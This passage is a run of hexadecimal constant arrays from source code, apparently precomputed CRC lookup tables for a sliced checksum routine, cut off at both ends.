0x82a281e1, 0x9a014d62, 0xd48846cb, 0x07135a30, 0x499a5199, 0x7b546587, 0x35dd6e2e, 0xe64672d5, 0xa8cf797c, 0x83da1ae9, 0xcd531140, 0x1ec80dbb, 0x50410612, 0x628f320c, 0x2c0639a5, 0xff9d255e, 0xb1142ef7, 0x46c47ef1, 0x084d7558, 0xdbd669a3, 0x955f620a, 0xa7915614, 0xe9185dbd, 0x3a834146, 0x740a4aef, 0x5f1f297a, 0x119622d3, 0xc20d3e28, 0x8c843581, 0xbe4a019f, 0xf0c30a36, 0x235816cd, 0x6dd11d64, 0x7572d1e7, 0x3bfbda4e, 0xe860c6b5, 0xa6e9cd1c, 0x9427f902, 0xdaaef2ab, 0x0935ee50, 0x47bce5f9, 0x6ca9866c, 0x22208dc5, 0xf1bb913e, 0xbf329a97, 0x8dfcae89, 0xc375a520, 0x10eeb9db, 0x5e67b272, 0x21a920dd, 0x6f202b74, 0xbcbb378f, 0xf2323c26, 0xc0fc0838, 0x8e750391, 0x5dee1f6a, 0x136714c3, 0x38727756, 0x76fb7cff, 0xa5606004, 0xebe96bad, 0xd9275fb3, 0x97ae541a, 0x443548e1, 0x0abc4348, 0x121f8fcb, 0x5c968462, 0x8f0d9899, 0xc1849330, 0xf34aa72e, 0xbdc3ac87, 0x6e58b07c, 0x20d1bbd5, 
0x0bc4d840, 0x454dd3e9, 0x96d6cf12, 0xd85fc4bb, 0xea91f0a5, 0xa418fb0c, 0x7783e7f7, 0x390aec5e, 0x881ec2a9, 0xc697c900, 0x150cd5fb, 0x5b85de52, 0x694bea4c, 0x27c2e1e5, 0xf459fd1e, 0xbad0f6b7, 0x91c59522, 0xdf4c9e8b, 0x0cd78270, 0x425e89d9, 0x7090bdc7, 0x3e19b66e, 0xed82aa95, 0xa30ba13c, 0xbba86dbf, 0xf5216616, 0x26ba7aed, 0x68337144, 0x5afd455a, 0x14744ef3, 0xc7ef5208, 0x896659a1, 0xa2733a34, 0xecfa319d, 0x3f612d66, 0x71e826cf, 0x432612d1, 0x0daf1978, 0xde340583, 0x90bd0e2a, 0xef739c85, 0xa1fa972c, 0x72618bd7, 0x3ce8807e, 0x0e26b460, 0x40afbfc9, 0x9334a332, 0xddbda89b, 0xf6a8cb0e, 0xb821c0a7, 0x6bbadc5c, 0x2533d7f5, 0x17fde3eb, 0x5974e842, 0x8aeff4b9, 0xc466ff10, 0xdcc53393, 0x924c383a, 0x41d724c1, 0x0f5e2f68, 0x3d901b76, 0x731910df, 0xa0820c24, 0xee0b078d, 0xc51e6418, 0x8b976fb1, 0x580c734a, 0x168578e3, 0x244b4cfd, 0x6ac24754, 0xb9595baf, 0xf7d05006}, {0x00000000, 0x8d88fde2, 0xc060fd85, 0x4de80067, 0x5bb0fd4b, 0xd63800a9, 0x9bd000ce, 0x1658fd2c, 0xb761fa96, 0x3ae90774, 0x77010713, 0xfa89faf1, 0xecd107dd, 0x6159fa3f, 0x2cb1fa58, 0xa13907ba, 0xb5b2f36d, 0x383a0e8f, 0x75d20ee8, 0xf85af30a, 0xee020e26, 0x638af3c4, 0x2e62f3a3, 0xa3ea0e41, 0x02d309fb, 0x8f5bf419, 0xc2b3f47e, 0x4f3b099c, 0x5963f4b0, 0xd4eb0952, 0x99030935, 0x148bf4d7, 0xb014e09b, 0x3d9c1d79, 0x70741d1e, 0xfdfce0fc, 0xeba41dd0, 0x662ce032, 0x2bc4e055, 0xa64c1db7, 0x07751a0d, 0x8afde7ef, 0xc715e788, 0x4a9d1a6a, 0x5cc5e746, 0xd14d1aa4, 0x9ca51ac3, 0x112de721, 0x05a613f6, 0x882eee14, 0xc5c6ee73, 0x484e1391, 0x5e16eebd, 0xd39e135f, 0x9e761338, 0x13feeeda, 0xb2c7e960, 0x3f4f1482, 0x72a714e5, 0xff2fe907, 0xe977142b, 0x64ffe9c9, 0x2917e9ae, 0xa49f144c, 0xbb58c777, 0x36d03a95, 0x7b383af2, 0xf6b0c710, 0xe0e83a3c, 0x6d60c7de, 0x2088c7b9, 0xad003a5b, 0x0c393de1, 0x81b1c003, 0xcc59c064, 0x41d13d86, 0x5789c0aa, 0xda013d48, 0x97e93d2f, 0x1a61c0cd, 0x0eea341a, 0x8362c9f8, 0xce8ac99f, 0x4302347d, 0x555ac951, 0xd8d234b3, 0x953a34d4, 0x18b2c936, 0xb98bce8c, 0x3403336e, 0x79eb3309, 0xf463ceeb, 0xe23b33c7, 0x6fb3ce25, 
0x225bce42, 0xafd333a0, 0x0b4c27ec, 0x86c4da0e, 0xcb2cda69, 0x46a4278b, 0x50fcdaa7, 0xdd742745, 0x909c2722, 0x1d14dac0, 0xbc2ddd7a, 0x31a52098, 0x7c4d20ff, 0xf1c5dd1d, 0xe79d2031, 0x6a15ddd3, 0x27fdddb4, 0xaa752056, 0xbefed481, 0x33762963, 0x7e9e2904, 0xf316d4e6, 0xe54e29ca, 0x68c6d428, 0x252ed44f, 0xa8a629ad, 0x099f2e17, 0x8417d3f5, 0xc9ffd392, 0x44772e70, 0x522fd35c, 0xdfa72ebe, 0x924f2ed9, 0x1fc7d33b, 0xadc088af, 0x2048754d, 0x6da0752a, 0xe02888c8, 0xf67075e4, 0x7bf88806, 0x36108861, 0xbb987583, 0x1aa17239, 0x97298fdb, 0xdac18fbc, 0x5749725e, 0x41118f72, 0xcc997290, 0x817172f7, 0x0cf98f15, 0x18727bc2, 0x95fa8620, 0xd8128647, 0x559a7ba5, 0x43c28689, 0xce4a7b6b, 0x83a27b0c, 0x0e2a86ee, 0xaf138154, 0x229b7cb6, 0x6f737cd1, 0xe2fb8133, 0xf4a37c1f, 0x792b81fd, 0x34c3819a, 0xb94b7c78, 0x1dd46834, 0x905c95d6, 0xddb495b1, 0x503c6853, 0x4664957f, 0xcbec689d, 0x860468fa, 0x0b8c9518, 0xaab592a2, 0x273d6f40, 0x6ad56f27, 0xe75d92c5, 0xf1056fe9, 0x7c8d920b, 0x3165926c, 0xbced6f8e, 0xa8669b59, 0x25ee66bb, 0x680666dc, 0xe58e9b3e, 0xf3d66612, 0x7e5e9bf0, 0x33b69b97, 0xbe3e6675, 0x1f0761cf, 0x928f9c2d, 0xdf679c4a, 0x52ef61a8, 0x44b79c84, 0xc93f6166, 0x84d76101, 0x095f9ce3, 0x16984fd8, 0x9b10b23a, 0xd6f8b25d, 0x5b704fbf, 0x4d28b293, 0xc0a04f71, 0x8d484f16, 0x00c0b2f4, 0xa1f9b54e, 0x2c7148ac, 0x619948cb, 0xec11b529, 0xfa494805, 0x77c1b5e7, 0x3a29b580, 0xb7a14862, 0xa32abcb5, 0x2ea24157, 0x634a4130, 0xeec2bcd2, 0xf89a41fe, 0x7512bc1c, 0x38fabc7b, 0xb5724199, 0x144b4623, 0x99c3bbc1, 0xd42bbba6, 0x59a34644, 0x4ffbbb68, 0xc273468a, 0x8f9b46ed, 0x0213bb0f, 0xa68caf43, 0x2b0452a1, 0x66ec52c6, 0xeb64af24, 0xfd3c5208, 0x70b4afea, 0x3d5caf8d, 0xb0d4526f, 0x11ed55d5, 0x9c65a837, 0xd18da850, 0x5c0555b2, 0x4a5da89e, 0xc7d5557c, 0x8a3d551b, 0x07b5a8f9, 0x133e5c2e, 0x9eb6a1cc, 0xd35ea1ab, 0x5ed65c49, 0x488ea165, 0xc5065c87, 0x88ee5ce0, 0x0566a102, 0xa45fa6b8, 0x29d75b5a, 0x643f5b3d, 0xe9b7a6df, 0xffef5bf3, 0x7267a611, 0x3f8fa676, 0xb2075b94}, {0x00000000, 0x80f0171f, 0xda91287f, 0x5a613f60, 
0x6e5356bf, 0xeea341a0, 0xb4c27ec0, 0x343269df, 0xdca6ad7e, 0x5c56ba61, 0x06378501, 0x86c7921e, 0xb2f5fbc1, 0x3205ecde, 0x6864d3be, 0xe894c4a1, 0x623c5cbd, 0xe2cc4ba2, 0xb8ad74c2, 0x385d63dd, 0x0c6f0a02, 0x8c9f1d1d, 0xd6fe227d, 0x560e3562, 0xbe9af1c3, 0x3e6ae6dc, 0x640bd9bc, 0xe4fbcea3, 0xd0c9a77c, 0x5039b063, 0x0a588f03, 0x8aa8981c, 0xc478b97a, 0x4488ae65, 0x1ee99105, 0x9e19861a, 0xaa2befc5, 0x2adbf8da, 0x70bac7ba, 0xf04ad0a5, 0x18de1404, 0x982e031b, 0xc24f3c7b, 0x42bf2b64, 0x768d42bb, 0xf67d55a4, 0xac1c6ac4, 0x2cec7ddb, 0xa644e5c7, 0x26b4f2d8, 0x7cd5cdb8, 0xfc25daa7, 0xc817b378, 0x48e7a467, 0x12869b07, 0x92768c18, 0x7ae248b9, 0xfa125fa6, 0xa07360c6, 0x208377d9, 0x14b11e06, 0x94410919, 0xce203679, 0x4ed02166, 0x538074b5, 0xd37063aa, 0x89115cca, 0x09e14bd5, 0x3dd3220a, 0xbd233515, 0xe7420a75, 0x67b21d6a, 0x8f26d9cb, 0x0fd6ced4, 0x55b7f1b4, 0xd547e6ab, 0xe1758f74, 0x6185986b, 0x3be4a70b, 0xbb14b014, 0x31bc2808, 0xb14c3f17, 0xeb2d0077, 0x6bdd1768, 0x5fef7eb7, 0xdf1f69a8, 0x857e56c8, 0x058e41d7, 0xed1a8576, 0x6dea9269, 0x378bad09, 0xb77bba16, 0x8349d3c9, 0x03b9c4d6, 0x59d8fbb6, 0xd928eca9, 0x97f8cdcf, 0x1708dad0, 0x4d69e5b0, 0xcd99f2af, 0xf9ab9b70, 0x795b8c6f, 0x233ab30f, 0xa3caa410, 0x4b5e60b1, 0xcbae77ae, 0x91cf48ce, 0x113f5fd1, 0x250d360e, 0xa5fd2111, 0xff9c1e71, 0x7f6c096e, 0xf5c49172, 0x7534866d, 0x2f55b90d, 0xafa5ae12, 0x9b97c7cd, 0x1b67d0d2, 0x4106efb2, 0xc1f6f8ad, 0x29623c0c, 0xa9922b13, 0xf3f31473, 0x7303036c, 0x47316ab3, 0xc7c17dac, 0x9da042cc, 0x1d5055d3, 0xa700e96a, 0x27f0fe75, 0x7d91c115, 0xfd61d60a, 0xc953bfd5, 0x49a3a8ca, 0x13c297aa, 0x933280b5, 0x7ba64414, 0xfb56530b, 0xa1376c6b, 0x21c77b74, 0x15f512ab, 0x950505b4, 0xcf643ad4, 0x4f942dcb, 0xc53cb5d7, 0x45cca2c8, 0x1fad9da8, 0x9f5d8ab7, 0xab6fe368, 0x2b9ff477, 0x71fecb17, 0xf10edc08, 0x199a18a9, 0x996a0fb6, 0xc30b30d6, 0x43fb27c9, 0x77c94e16, 0xf7395909, 0xad586669, 0x2da87176, 0x63785010, 0xe388470f, 0xb9e9786f, 0x39196f70, 0x0d2b06af, 0x8ddb11b0, 0xd7ba2ed0, 0x574a39cf, 0xbfdefd6e, 0x3f2eea71, 
0x654fd511, 0xe5bfc20e, 0xd18dabd1, 0x517dbcce, 0x0b1c83ae, 0x8bec94b1, 0x01440cad, 0x81b41bb2, 0xdbd524d2, 0x5b2533cd, 0x6f175a12, 0xefe74d0d, 0xb586726d, 0x35766572, 0xdde2a1d3, 0x5d12b6cc, 0x077389ac, 0x87839eb3, 0xb3b1f76c, 0x3341e073, 0x6920df13, 0xe9d0c80c, 0xf4809ddf, 0x74708ac0, 0x2e11b5a0, 0xaee1a2bf, 0x9ad3cb60, 0x1a23dc7f, 0x4042e31f, 0xc0b2f400, 0x282630a1, 0xa8d627be, 0xf2b718de, 0x72470fc1, 0x4675661e, 0xc6857101, 0x9ce44e61, 0x1c14597e, 0x96bcc162, 0x164cd67d, 0x4c2de91d, 0xccddfe02, 0xf8ef97dd, 0x781f80c2, 0x227ebfa2, 0xa28ea8bd, 0x4a1a6c1c, 0xcaea7b03, 0x908b4463, 0x107b537c, 0x24493aa3, 0xa4b92dbc, 0xfed812dc, 0x7e2805c3, 0x30f824a5, 0xb00833ba, 0xea690cda, 0x6a991bc5, 0x5eab721a, 0xde5b6505, 0x843a5a65, 0x04ca4d7a, 0xec5e89db, 0x6cae9ec4, 0x36cfa1a4, 0xb63fb6bb, 0x820ddf64, 0x02fdc87b, 0x589cf71b, 0xd86ce004, 0x52c47818, 0xd2346f07, 0x88555067, 0x08a54778, 0x3c972ea7, 0xbc6739b8, 0xe60606d8, 0x66f611c7, 0x8e62d566, 0x0e92c279, 0x54f3fd19, 0xd403ea06, 0xe03183d9, 0x60c194c6, 0x3aa0aba6, 0xba50bcb9}, {0x00000000, 0x9570d495, 0xf190af6b, 0x64e07bfe, 0x38505897, 0xad208c02, 0xc9c0f7fc, 0x5cb02369, 0x70a0b12e, 0xe5d065bb, 0x81301e45, 0x1440cad0, 0x48f0e9b9, 0xdd803d2c, 0xb96046d2, 0x2c109247, 0xe141625c, 0x7431b6c9, 0x10d1cd37, 0x85a119a2, 0xd9113acb, 0x4c61ee5e, 0x288195a0, 0xbdf14135, 0x91e1d372, 0x049107e7, 0x60717c19, 0xf501a88c, 0xa9b18be5, 0x3cc15f70, 0x5821248e, 0xcd51f01b, 0x19f3c2f9, 0x8c83166c, 0xe8636d92, 0x7d13b907, 0x21a39a6e, 0xb4d34efb, 0xd0333505, 0x4543e190, 0x695373d7, 0xfc23a742, 0x98c3dcbc, 0x0db30829, 0x51032b40, 0xc473ffd5, 0xa093842b, 0x35e350be, 0xf8b2a0a5, 0x6dc27430, 0x09220fce, 0x9c52db5b, 0xc0e2f832, 0x55922ca7, 0x31725759, 0xa40283cc, 0x8812118b, 0x1d62c51e, 0x7982bee0, 0xecf26a75, 0xb042491c, 0x25329d89, 0x41d2e677, 0xd4a232e2, 0x33e785f2, 0xa6975167, 0xc2772a99, 0x5707fe0c, 0x0bb7dd65, 0x9ec709f0, 0xfa27720e, 0x6f57a69b, 0x434734dc, 0xd637e049, 0xb2d79bb7, 0x27a74f22, 0x7b176c4b, 0xee67b8de, 0x8a87c320, 0x1ff717b5, 
0xd2a6e7ae, 0x47d6333b, 0x233648c5, 0xb6469c50, 0xeaf6bf39, 0x7f866bac, 0x1b661052, 0x8e16c4c7, 0xa2065680, 0x37768215, 0x5396f9eb, 0xc6e62d7e, 0x9a560e17, 0x0f26da82, 0x6bc6a17c, 0xfeb675e9, 0x2a14470b, 0xbf64939e, 0xdb84e860, 0x4ef43cf5, 0x12441f9c, 0x8734cb09, 0xe3d4b0f7, 0x76a46462, 0x5ab4f625, 0xcfc422b0, 0xab24594e, 0x3e548ddb, 0x62e4aeb2, 0xf7947a27, 0x937401d9, 0x0604d54c, 0xcb552557, 0x5e25f1c2, 0x3ac58a3c, 0xafb55ea9, 0xf3057dc0, 0x6675a955, 0x0295d2ab, 0x97e5063e, 0xbbf59479, 0x2e8540ec, 0x4a653b12, 0xdf15ef87, 0x83a5ccee, 0x16d5187b, 0x72356385, 0xe745b710, 0x67cf0be4, 0xf2bfdf71, 0x965fa48f, 0x032f701a, 0x5f9f5373, 0xcaef87e6, 0xae0ffc18, 0x3b7f288d, 0x176fbaca, 0x821f6e5f, 0xe6ff15a1, 0x738fc134, 0x2f3fe25d, 0xba4f36c8, 0xdeaf4d36, 0x4bdf99a3, 0x868e69b8, 0x13febd2d, 0x771ec6d3, 0xe26e1246, 0xbede312f, 0x2baee5ba, 0x4f4e9e44, 0xda3e4ad1, 0xf62ed896, 0x635e0c03, 0x07be77fd, 0x92cea368, 0xce7e8001, 0x5b0e5494, 0x3fee2f6a, 0xaa9efbff, 0x7e3cc91d, 0xeb4c1d88, 0x8fac6676, 0x1adcb2e3, 0x466c918a, 0xd31c451f, 0xb7fc3ee1, 0x228cea74, 0x0e9c7833, 0x9becaca6, 0xff0cd758, 0x6a7c03cd, 0x36cc20a4, 0xa3bcf431, 0xc75c8fcf, 0x522c5b5a, 0x9f7dab41, 0x0a0d7fd4, 0x6eed042a, 0xfb9dd0bf, 0xa72df3d6, 0x325d2743, 0x56bd5cbd, 0xc3cd8828, 0xefdd1a6f, 0x7aadcefa, 0x1e4db504, 0x8b3d6191, 0xd78d42f8, 0x42fd966d, 0x261ded93, 0xb36d3906, 0x54288e16, 0xc1585a83, 0xa5b8217d, 0x30c8f5e8, 0x6c78d681, 0xf9080214, 0x9de879ea, 0x0898ad7f, 0x24883f38, 0xb1f8ebad, 0xd5189053, 0x406844c6, 0x1cd867af, 0x89a8b33a, 0xed48c8c4, 0x78381c51, 0xb569ec4a, 0x201938df, 0x44f94321, 0xd18997b4, 0x8d39b4dd, 0x18496048, 0x7ca91bb6, 0xe9d9cf23, 0xc5c95d64, 0x50b989f1, 0x3459f20f, 0xa129269a, 0xfd9905f3, 0x68e9d166, 0x0c09aa98, 0x99797e0d, 0x4ddb4cef, 0xd8ab987a, 0xbc4be384, 0x293b3711, 0x758b1478, 0xe0fbc0ed, 0x841bbb13, 0x116b6f86, 0x3d7bfdc1, 0xa80b2954, 0xcceb52aa, 0x599b863f, 0x052ba556, 0x905b71c3, 0xf4bb0a3d, 0x61cbdea8, 0xac9a2eb3, 0x39eafa26, 0x5d0a81d8, 0xc87a554d, 0x94ca7624, 0x01baa2b1, 
0x655ad94f, 0xf02a0dda, 0xdc3a9f9d, 0x494a4b08, 0x2daa30f6, 0xb8dae463, 0xe46ac70a, 0x711a139f, 0x15fa6861, 0x808abcf4}, {0x00000000, 0xcf9e17c8, 0x444d29d1, 0x8bd33e19, 0x889a53a2, 0x4704446a, 0xccd77a73, 0x03496dbb, 0xca45a105, 0x05dbb6cd, 0x8e0888d4, 0x41969f1c, 0x42dff2a7, 0x8d41e56f, 0x0692db76, 0xc90cccbe, 0x4ffa444b, 0x80645383, 0x0bb76d9a, 0xc4297a52, 0xc76017e9, 0x08fe0021, 0x832d3e38, 0x4cb329f0, 0x85bfe54e, 0x4a21f286, 0xc1f2cc9f, 0x0e6cdb57, 0x0d25b6ec, 0xc2bba124, 0x49689f3d, 0x86f688f5, 0x9ff48896, 0x506a9f5e, 0xdbb9a147, 0x1427b68f, 0x176edb34, 0xd8f0ccfc, 0x5323f2e5, 0x9cbde52d, 0x55b12993, 0x9a2f3e5b, 0x11fc0042, 0xde62178a, 0xdd2b7a31, 0x12b56df9, 0x996653e0, 0x56f84428, 0xd00eccdd, 0x1f90db15, 0x9443e50c, 0x5bddf2c4, 0x58949f7f, 0x970a88b7, 0x1cd9b6ae, 0xd347a166, 0x1a4b6dd8, 0xd5d57a10, 0x5e064409, 0x919853c1, 0x92d13e7a, 0x5d4f29b2, 0xd69c17ab, 0x19020063, 0xe498176d, 0x2b0600a5, 0xa0d53ebc, 0x6f4b2974, 0x6c0244cf, 0xa39c5307, 0x284f6d1e, 0xe7d17ad6, 0x2eddb668, 0xe143a1a0, 0x6a909fb9, 0xa50e8871, 0xa647e5ca, 0x69d9f202, 0xe20acc1b, 0x2d94dbd3, 0xab625326, 0x64fc44ee, 0xef2f7af7, 0x20b16d3f, 0x23f80084, 0xec66174c, 0x67b52955, 0xa82b3e9d, 0x6127f223, 0xaeb9e5eb, 0x256adbf2, 0xeaf4cc3a, 0xe9bda181, 0x2623b649, 0xadf08850, 0x626e9f98, 0x7b6c9ffb, 0xb4f28833, 0x3f21b62a, 0xf0bfa1e2, 0xf3f6cc59, 0x3c68db91, 0xb7bbe588, 0x7825f240, 0xb1293efe, 0x7eb72936, 0xf564172f, 0x3afa00e7, 0x39b36d5c, 0xf62d7a94, 0x7dfe448d, 0xb2605345, 0x3496dbb0, 0xfb08cc78, 0x70dbf261, 0xbf45e5a9, 0xbc0c8812, 0x73929fda, 0xf841a1c3, 0x37dfb60b, 0xfed37ab5, 0x314d6d7d, 0xba9e5364, 0x750044ac, 0x76492917, 0xb9d73edf, 0x320400c6, 0xfd9a170e, 0x1241289b, 0xdddf3f53, 0x560c014a, 0x99921682, 0x9adb7b39, 0x55456cf1, 0xde9652e8, 0x11084520, 0xd804899e, 0x179a9e56, 0x9c49a04f, 0x53d7b787, 0x509eda3c, 0x9f00cdf4, 0x14d3f3ed, 0xdb4de425, 0x5dbb6cd0, 0x92257b18, 0x19f64501, 0xd66852c9, 0xd5213f72, 0x1abf28ba, 0x916c16a3, 0x5ef2016b, 0x97fecdd5, 0x5860da1d, 0xd3b3e404, 0x1c2df3cc, 
0x1f649e77, 0xd0fa89bf, 0x5b29b7a6, 0x94b7a06e, 0x8db5a00d, 0x422bb7c5, 0xc9f889dc, 0x06669e14, 0x052ff3af, 0xcab1e467, 0x4162da7e, 0x8efccdb6, 0x47f00108, 0x886e16c0, 0x03bd28d9, 0xcc233f11, 0xcf6a52aa, 0x00f44562, 0x8b277b7b, 0x44b96cb3, 0xc24fe446, 0x0dd1f38e, 0x8602cd97, 0x499cda5f, 0x4ad5b7e4, 0x854ba02c, 0x0e989e35, 0xc10689fd, 0x080a4543, 0xc794528b, 0x4c476c92, 0x83d97b5a, 0x809016e1, 0x4f0e0129, 0xc4dd3f30, 0x0b4328f8, 0xf6d93ff6, 0x3947283e, 0xb2941627, 0x7d0a01ef, 0x7e436c54, 0xb1dd7b9c, 0x3a0e4585, 0xf590524d, 0x3c9c9ef3, 0xf302893b, 0x78d1b722, 0xb74fa0ea, 0xb406cd51, 0x7b98da99, 0xf04be480, 0x3fd5f348, 0xb9237bbd, 0x76bd6c75, 0xfd6e526c, 0x32f045a4, 0x31b9281f, 0xfe273fd7, 0x75f401ce, 0xba6a1606, 0x7366dab8, 0xbcf8cd70, 0x372bf369, 0xf8b5e4a1, 0xfbfc891a, 0x34629ed2, 0xbfb1a0cb, 0x702fb703, 0x692db760, 0xa6b3a0a8, 0x2d609eb1, 0xe2fe8979, 0xe1b7e4c2, 0x2e29f30a, 0xa5facd13, 0x6a64dadb, 0xa3681665, 0x6cf601ad, 0xe7253fb4, 0x28bb287c, 0x2bf245c7, 0xe46c520f, 0x6fbf6c16, 0xa0217bde, 0x26d7f32b, 0xe949e4e3, 0x629adafa, 0xad04cd32, 0xae4da089, 0x61d3b741, 0xea008958, 0x259e9e90, 0xec92522e, 0x230c45e6, 0xa8df7bff, 0x67416c37, 0x6408018c, 0xab961644, 0x2045285d, 0xefdb3f95}, {0x00000000, 0x24825136, 0x4904a26c, 0x6d86f35a, 0x920944d8, 0xb68b15ee, 0xdb0de6b4, 0xff8fb782, 0xff638ff1, 0xdbe1dec7, 0xb6672d9d, 0x92e57cab, 0x6d6acb29, 0x49e89a1f, 0x246e6945, 0x00ec3873, 0x25b619a3, 0x01344895, 0x6cb2bbcf, 0x4830eaf9, 0xb7bf5d7b, 0x933d0c4d, 0xfebbff17, 0xda39ae21, 0xdad59652, 0xfe57c764, 0x93d1343e, 0xb7536508, 0x48dcd28a, 0x6c5e83bc, 0x01d870e6, 0x255a21d0, 0x4b6c3346, 0x6fee6270, 0x0268912a, 0x26eac01c, 0xd965779e, 0xfde726a8, 0x9061d5f2, 0xb4e384c4, 0xb40fbcb7, 0x908ded81, 0xfd0b1edb, 0xd9894fed, 0x2606f86f, 0x0284a959, 0x6f025a03, 0x4b800b35, 0x6eda2ae5, 0x4a587bd3, 0x27de8889, 0x035cd9bf, 0xfcd36e3d, 0xd8513f0b, 0xb5d7cc51, 0x91559d67, 0x91b9a514, 0xb53bf422, 0xd8bd0778, 0xfc3f564e, 0x03b0e1cc, 0x2732b0fa, 0x4ab443a0, 0x6e361296, 0x96d8668c, 0xb25a37ba, 
0xdfdcc4e0, 0xfb5e95d6, 0x04d12254, 0x20537362, 0x4dd58038, 0x6957d10e, 0x69bbe97d, 0x4d39b84b, 0x20bf4b11, 0x043d1a27, 0xfbb2ada5, 0xdf30fc93, 0xb2b60fc9, 0x96345eff, 0xb36e7f2f, 0x97ec2e19, 0xfa6add43, 0xdee88c75, 0x21673bf7, 0x05e56ac1, 0x6863999b, 0x4ce1c8ad, 0x4c0df0de, 0x688fa1e8, 0x050952b2, 0x218b0384, 0xde04b406, 0xfa86e530, 0x9700166a, 0xb382475c, 0xddb455ca, 0xf93604fc, 0x94b0f7a6, 0xb032a690, 0x4fbd1112, 0x6b3f4024, 0x06b9b37e, 0x223be248, 0x22d7da3b, 0x06558b0d, 0x6bd37857, 0x4f512961, 0xb0de9ee3, 0x945ccfd5, 0xf9da3c8f, 0xdd586db9, 0xf8024c69, 0xdc801d5f, 0xb106ee05, 0x9584bf33, 0x6a0b08b1, 0x4e895987, 0x230faadd, 0x078dfbeb, 0x0761c398, 0x23e392ae, 0x4e6561f4, 0x6ae730c2, 0x95688740, 0xb1ead676, 0xdc6c252c, 0xf8ee741a, 0xf6c1cb59, 0xd2439a6f, 0xbfc56935, 0x9b473803, 0x64c88f81, 0x404adeb7, 0x2dcc2ded, 0x094e7cdb, 0x09a244a8, 0x2d20159e, 0x40a6e6c4, 0x6424b7f2, 0x9bab0070, 0xbf295146, 0xd2afa21c, 0xf62df32a, 0xd377d2fa, 0xf7f583cc, 0x9a737096, 0xbef121a0, 0x417e9622, 0x65fcc714, 0x087a344e, 0x2cf86578, 0x2c145d0b, 0x08960c3d, 0x6510ff67, 0x4192ae51, 0xbe1d19d3, 0x9a9f48e5, 0xf719bbbf, 0xd39bea89, 0xbdadf81f, 0x992fa929, 0xf4a95a73, 0xd02b0b45, 0x2fa4bcc7, 0x0b26edf1, 0x66a01eab, 0x42224f9d, 0x42ce77ee, 0x664c26d8, 0x0bcad582, 0x2f4884b4, 0xd0c73336, 0xf4456200, 0x99c3915a, 0xbd41c06c, 0x981be1bc, 0xbc99b08a, 0xd11f43d0, 0xf59d12e6, 0x0a12a564, 0x2e90f452, 0x43160708, 0x6794563e, 0x67786e4d, 0x43fa3f7b, 0x2e7ccc21, 0x0afe9d17, 0xf5712a95, 0xd1f37ba3, 0xbc7588f9, 0x98f7d9cf, 0x6019add5, 0x449bfce3, 0x291d0fb9, 0x0d9f5e8f, 0xf210e90d, 0xd692b83b, 0xbb144b61, 0x9f961a57, 0x9f7a2224, 0xbbf87312, 0xd67e8048, 0xf2fcd17e, 0x0d7366fc, 0x29f137ca, 0x4477c490, 0x60f595a6, 0x45afb476, 0x612de540, 0x0cab161a, 0x2829472c, 0xd7a6f0ae, 0xf324a198, 0x9ea252c2, 0xba2003f4, 0xbacc3b87, 0x9e4e6ab1, 0xf3c899eb, 0xd74ac8dd, 0x28c57f5f, 0x0c472e69, 0x61c1dd33, 0x45438c05, 0x2b759e93, 0x0ff7cfa5, 0x62713cff, 0x46f36dc9, 0xb97cda4b, 0x9dfe8b7d, 0xf0787827, 0xd4fa2911, 
0xd4161162, 0xf0944054, 0x9d12b30e, 0xb990e238, 0x461f55ba, 0x629d048c, 0x0f1bf7d6, 0x2b99a6e0, 0x0ec38730, 0x2a41d606, 0x47c7255c, 0x6345746a, 0x9ccac3e8, 0xb84892de, 0xd5ce6184, 0xf14c30b2, 0xf1a008c1, 0xd52259f7, 0xb8a4aaad, 0x9c26fb9b, 0x63a94c19, 0x472b1d2f, 0x2aadee75, 0x0e2fbf43}, {0x00000000, 0x36f290f3, 0x6de521e6, 0x5b17b115, 0xdbca43cc, 0xed38d33f, 0xb62f622a, 0x80ddf2d9, 0x6ce581d9, 0x5a17112a, 0x0100a03f, 0x37f230cc, 0xb72fc215, 0x81dd52e6, 0xdacae3f3, 0xec387300, 0xd9cb03b2, 0xef399341, 0xb42e2254, 0x82dcb2a7, 0x0201407e, 0x34f3d08d, 0x6fe46198, 0x5916f16b, 0xb52e826b, 0x83dc1298, 0xd8cba38d, 0xee39337e, 0x6ee4c1a7, 0x58165154, 0x0301e041, 0x35f370b2, 0x68e70125, 0x5e1591d6, 0x050220c3, 0x33f0b030, 0xb32d42e9, 0x85dfd21a, 0xdec8630f, 0xe83af3fc, 0x040280fc, 0x32f0100f, 0x69e7a11a, 0x5f1531e9, 0xdfc8c330, 0xe93a53c3, 0xb22de2d6, 0x84df7225, 0xb12c0297, 0x87de9264, 0xdcc92371, 0xea3bb382, 0x6ae6415b, 0x5c14d1a8, 0x070360bd, 0x31f1f04e, 0xddc9834e, 0xeb3b13bd, 0xb02ca2a8, 0x86de325b, 0x0603c082, 0x30f15071, 0x6be6e164, 0x5d147197, 0xd1ce024a, 0xe73c92b9, 0xbc2b23ac, 0x8ad9b35f, 0x0a044186, 0x3cf6d175, 0x67e16060, 0x5113f093, 0xbd2b8393, 0x8bd91360, 0xd0cea275, 0xe63c3286, 0x66e1c05f, 0x501350ac, 0x0b04e1b9, 0x3df6714a, 0x080501f8, 0x3ef7910b, 0x65e0201e, 0x5312b0ed, 0xd3cf4234, 0xe53dd2c7, 0xbe2a63d2, 0x88d8f321, 0x64e08021, 0x521210d2, 0x0905a1c7, 0x3ff73134, 0xbf2ac3ed, 0x89d8531e, 0xd2cfe20b, 0xe43d72f8, 0xb929036f, 0x8fdb939c, 0xd4cc2289, 0xe23eb27a, 0x62e340a3, 0x5411d050, 0x0f066145, 0x39f4f1b6, 0xd5cc82b6, 0xe33e1245, 0xb829a350, 0x8edb33a3, 0x0e06c17a, 0x38f45189, 0x63e3e09c, 0x5511706f, 0x60e200dd, 0x5610902e, 0x0d07213b, 0x3bf5b1c8, 0xbb284311, 0x8ddad3e2, 0xd6cd62f7, 0xe03ff204, 0x0c078104, 0x3af511f7, 0x61e2a0e2, 0x57103011, 0xd7cdc2c8, 0xe13f523b, 0xba28e32e, 0x8cda73dd, 0x78ed02d5, 0x4e1f9226, 0x15082333, 0x23fab3c0, 0xa3274119, 0x95d5d1ea, 0xcec260ff, 0xf830f00c, 0x1408830c, 0x22fa13ff, 0x79eda2ea, 0x4f1f3219, 0xcfc2c0c0, 0xf9305033, 
